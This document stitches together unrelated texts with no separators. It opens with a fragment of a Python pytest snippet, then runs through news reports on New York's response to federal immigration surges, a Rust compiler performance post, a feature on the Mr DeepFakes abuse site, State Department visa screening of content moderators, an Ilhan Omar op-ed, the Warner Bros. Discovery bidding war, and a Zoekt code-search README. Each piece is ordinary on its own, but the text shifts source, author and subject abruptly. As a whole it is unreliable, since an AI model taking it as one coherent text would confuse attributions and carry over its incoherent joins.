def test_settings_are_documented(settings_headings, subtests): for setting in app.SETTINGS: with subtests.test(setting=setting.name): assert setting.name in settings_headings
Why is this better? Two reasons:
I had Claude Code port several tests to the new pattern. I like it.
Jackie Bray has been thinking about how quickly things could spiral out of control.
Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?
It’s a problem only made more acute by how geared some of the operations have been towards gaining as much attention as possible, and by their direction away from immigration enforcement, and towards repressing protests in response.
The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.
Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch reportedly got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police placed barricades between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.
The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.
“I feel very lucky to not be an elected leader right now,” Bray told TPM.
Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.
For prevention, one model stands out: San Francisco.
There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.
That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.
Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.
There are other benefits that the state can provide Trump, whose family business is still deeply rooted in New York. This week, a state gambling board approved licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.
The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.
The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.
That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.
“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”
Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.
He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One video that Byron-Lopez recorded of an October encounter with Bovino demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Byron-Lopez would wave them off.
“They wanted to see escalation,” he told TPM last month.
Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.
The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.
City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.
New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.
Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.
They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.
On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.
“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.
Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.
The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, unidentified while wearing masks, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.
“Why? Tell me what the strategic, tactical, operational, requirement for that is?” Bray asked.
It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.
“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”
Josh Kovensky is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there. ]
It has been more than six months since my last post on the Rust compiler’s performance. In that time I lost one job and gained another . I have less time to work directly on the Rust compiler than I used to, but I am still doing some stuff, while also working on other interesting things .
#142095
: The compiler has a
data structure called
VecCache
which is a key-value store used with keys that
are densely-numbered IDs, such as
CrateNum
or
LocalDefId
. It’s a segmented
vector with increasingly large buckets added as it grows. In this PR
Josh
Triplett
optimized the common case when the
key is in the first segment, which holds 4096 entries. This gave icount
reductions across many benchmark runs, beyond 4% in the best cases.
#148040
: In this PR
Ben
Kimock
added a fast path for lowering trivial
consts. This reduced compile times for the
libc
crate by 5-15%! It’s unusual
to see a change that affects a single real-world crate so much, across all
compilation scenarios: debug and release, incremental and non-incremental.
This is a great result. At the time of writing,
libc
is the #12 mostly
popular crate on crates.io as measured by “recent downloads”, and #7 as
measured by “all-time downloads”. This change also reduced icounts for a few
other benchmarks by up to 10%.
#147293
: In the query system
there was a value computed on a hot path that was only used within a
debug!
call. In this PR I avoided doing that computation unless necessary, which gave
icount reductions across many benchmark results, more than 3% in the best case.
This was such a classic micro-optimization that I added it as an example to the
Logging and
Debugging
chapter of the
The Rust Performance
Book
.
#148706 : In this PR dianne optimized the handling of temporary scopes. This reduced icounts on a number of benchmarks, 3% in the best case. It also reduced peak memory usage on some of the secondary benchmarks containing very large literals, by 5% in the best cases.
#143684 : In this PR Nikita Popov upgraded the LLVM version used by the compiler to LLVM 21. In recent years every LLVM update has improved the speed of the Rust compiler. In this case the mean icount reduction across all benchmark results was an excellent 1.70% , and the mean cycle count reduction was 0.90% , but the mean wall-time saw an increase of 0.26% . Wall-time is the true metric, because it’s what users perceive, though it has high variance. icounts and cycles usually correlate well to wall-time, especially on large changes like this that affect many benchmarks, though this case is a counter-example. I’m not quite sure what to make of it; I don’t know whether the wall-time results on the test machine are representative.
#148789
: In this PR
Mara
Bos
reimplemented
format_args!()
and
fmt::Arguments
to be more space-efficient. This gave lots of small icount
wins, and a couple of enormous (30-38%) wins for the
large-workspace
stress
test. Mara wrote about this
on
Mastodon
. She also has written
about prior work on formatting on
her blog
and in
this tracking issue
.
Lots of great reading there for people who love nitty-gritty optimization
details, including nice diagrams of how data structures are laid out in memory.
In June I
added
a new compiler flag
-Zmacro-stats
that measures how much code is generated by
macros. I
wrote
previously
about how I used it to optimize
#[derive(Arbitrary)]
from the
arbitrary
crate used for fuzzing.
I also used it to streamline the code generated by
#[derive(Reflect)]
in
Bevy
. This derive is used to implement reflection on many
types and it produced a
lot
of code. For example, the
bevy_ui
crate was
around 16,000 lines and 563,000 bytes of source code. The code generated by
#[derive(Reflect)]
for types within that crate was around 27,000 lines and
1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly
because of this one macro!
The code generated by
#[derive(Reflect)]
had a lot of redundancies. I made
PRs to remove unnecessary
calls
,
duplicate type bounds
(and a
follow-up
),
const _
blocks
,
closures
,
arguments
,
trait bounds
,
attributes
,
impls
, and finally I
factored out some repetition
.
After doing this I measured the
bevy_window
crate. The size of the code
generated by
#[derive(Reflect)]
was reduced by 39%, which reduced
cargo
check
wall-time for that crate by 16%, and peak memory usage by 5%. And there
are likely similar improvements across many other crates within Bevy, as well
as programs that use
#[derive(Reflect)]
themselves.
It’s understandable that the generated code was suboptimal. Proc macros aren’t easy to write; there was previously no easy way to measure the size of the generated code; and the generated code was considered good enough because (a) it worked, and (b) the compiler would effectively optimize away all the redundancies. But in general it is more efficient to optimize away redundancies at the generation point, where context-specific and domain-specific information is available, rather than relying on sophisticated optimization machinery further down the compilation pipeline that has to reconstruct information. And it’s just less code to parse and represent in memory.
At RustWeek 2025 I had a conversation with
Predrag
Gruevski
about
rustdoc-json
(invoked with the
--output-format=json
flag) and its effects on the performance of
cargo-semver-checks
. I spent
some time looking into it and found one nice win.
#142335 : In this PR I reduced the number of allocations done by rustdoc-json. This gave wall-time reductions of up to 10% and peak memory usage reductions of up to 8%.
I also tried various other things to improve rustdoc-json’s speed, without much success. JSON is simple and easy to parse, and rustdoc-json’s schema for representing Rust code is easy for humans to read. These features are great for newcomers and people who want to experiment. It also means the JSON output is space-inefficient, which limits the performance of heavy-duty tools like cargo-semver-checks that are designed for large codebases. There are some obvious space optimizations that could be applied to the JSON schema, like shortening field names, omitting fields with default values, and interning repeated strings. But these all affect its readability and flexibility.
The right solution here is probably to introduce a performance-oriented second format for the heavy-duty users. #142642 is a draft attempt at this. Hopefully progress can be made here in the future.
Josh Triplett introduced a new experimental flag,
-Zhint-mostly-unused
, which
can give big compile time wins for people using small fractions of very large
crates. This is typically the case for certain large API crates, such as
windows
,
rustix
, and
aws-sdk-ec2
. Read about it
here
.
Did you know that macOS has a secret setting that can make Rust builds faster? No joke!
Progress since May must be split into two parts, because in July we changed the machine on which the measurements are done.
The first period (2025-05-20 to 2025-06-30) was on the old machine. The second period (2025-07-01 to 2025-12-03) was on the new machine.
The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary size changes were small increases (0.45% and 2.56%).
It’s good that wall-times went down overall, even if the other metrics were mixed. There is a slow but steady stream of bug fixes and new features to the compiler, which often hurt performance. In the absence of active performance work the natural tendency for a compiler is to get slower, so I view even small improvements as a win.
The new machine reduced wall-times by about 20%. It’s worth upgrading your hardware, if you can!
For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).
“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and Funk . “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”
The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”
Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the Panama Papers . The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.
It turned out that’s exactly what it was.
The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, it’s “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset”. This means when you’re trying to deepfake someone you don’t have many pictures of – so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)
The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”
In fact, that scenario was entirely possible. The origins of Mr Deepfakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an early interview to Vice about its potential. Shortly after, though, in early 2018, Reddit banned deepfake porn from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.
“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)
Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary, Deepfake Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.
Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum mentions that it made between $4,000 and $7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”
At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s] face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.
“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”
This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.
On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”
Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government announced plans to criminalise the creation and sharing of deepfake sexual abuse material , Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”
But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.
And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’
“After Mr DeepFakes shut down, I got an automatic email from one of them which said: “If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.”
In the UK and Ireland, Samaritans can be contacted on freephone 116 123, or email jo@samaritans.org or jo@samaritans.ie. In the US, you can call or text the 988 Suicide & Crisis Lifeline at 988 or chat at 988lifeline.org . In Australia, the crisis support service Lifeline is 13 11 14. Other international helplines can be found at befrienders.org
In the UK, Rape Crisis offers support for rape and sexual abuse on 0808 802 9999 in England and Wales, 0808 801 0302 in Scotland , or 0800 0246 991 in Northern Ireland . In the US, Rainn offers support on 800-656-4673. In Australia, support is available at 1800Respect (1800 737 732). Other international helplines can be found at ibiblio.org/rcip/internl.html
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo. Kevin Dietsch/Getty Images hide caption
toggle caption
Kevin Dietsch/Getty Images
The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.
The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by Reuters ; NPR also obtained a copy.
"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy announced by Secretary of State Marco Rubio in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."
The Trump administration has been highly critical of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.
President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their claims that tech companies unfairly target conservatives — even as many tech leaders have eased their policies in the face of that backlash .
Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."
It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.
"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.
"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."
In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."
The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."
First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.
"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.
Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of visa applicants' online speech .
On Wednesday, the State Department announced it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.
NPR's Bobby Allyn and Michele Kelemen contributed reporting.
Photo credit: Farah Abdi Warsameh/Associated Press // New York Times
On Tuesday, President Trump called my friends and me “garbage.”
This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd until it chanted “send her back” when he said my name .
Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.
“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”
Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.
The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.
While the president wastes his time attacking my community, my state, my governor and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.
The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.
When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.
I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.
We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.
Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.
Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.
Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.
The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.
The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.
Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.
Paramount certainly perceives it that way; the company’s attorneys wrote to Zaslav expressing “grave concerns” about the auction process.
Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.
Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.
Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.
Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to WBD CEO David Zaslav and the company’s board.
Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.
Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.
The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.
The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.
Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.
Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.
If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.
Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.
Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.
But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.
It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”
Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.
Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.
Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.
“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.
Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.
Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.
Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.
What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.
On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.
During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.
After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.
But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.
Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.
Plus, Washington is not the only regulatory battleground that media companies have to worry about.
A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.
Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.
“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”
A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”
Thoughts on Go vs. Rust vs. Zig ( via ) Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.
One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.
Posted 5th December 2025 at 4:28 am
"Zoekt, en gij zult spinazie eten" - Jan Eertink
("seek, and ye shall eat spinach" - My primary school teacher)
Zoekt is a text search engine intended for use with source code. (Pronunciation: roughly as you would pronounce "zooked" in English)
Note: This has been the maintained source for Zoekt since 2017, when it was forked from the original repository github.com/google/zoekt .
Zoekt supports fast substring and regexp matching on source code, with a rich query language that includes boolean operators (and, or, not). It can search individual repositories, and search across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic parsing, it works well for a variety of programming languages.
The two main ways to use the project are
For more details on Zoekt's design, see the docs directory .
go get github.com/sourcegraph/zoekt/
Note : It is also recommended to install Universal ctags , as symbol information is a key signal in ranking search results. See ctags.md for more information.
Zoekt supports indexing and searching repositories on the command line. This is most helpful for simple local usage, or for testing and development.
go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo
go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo
go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'
Zoekt also contains an index server and web server to support larger-scale indexing and searching of remote repositories. The index server can be configured to periodically fetch and reindex repositories from a code host. The webserver can be configured to serve search results through a web UI or API.
go install github.com/sourcegraph/zoekt/cmd/zoekt-indexserver
echo YOUR_GITHUB_TOKEN_HERE > token.txt
echo '[{"GitHubOrg": "apache", "CredentialPath": "token.txt"}]' > config.json
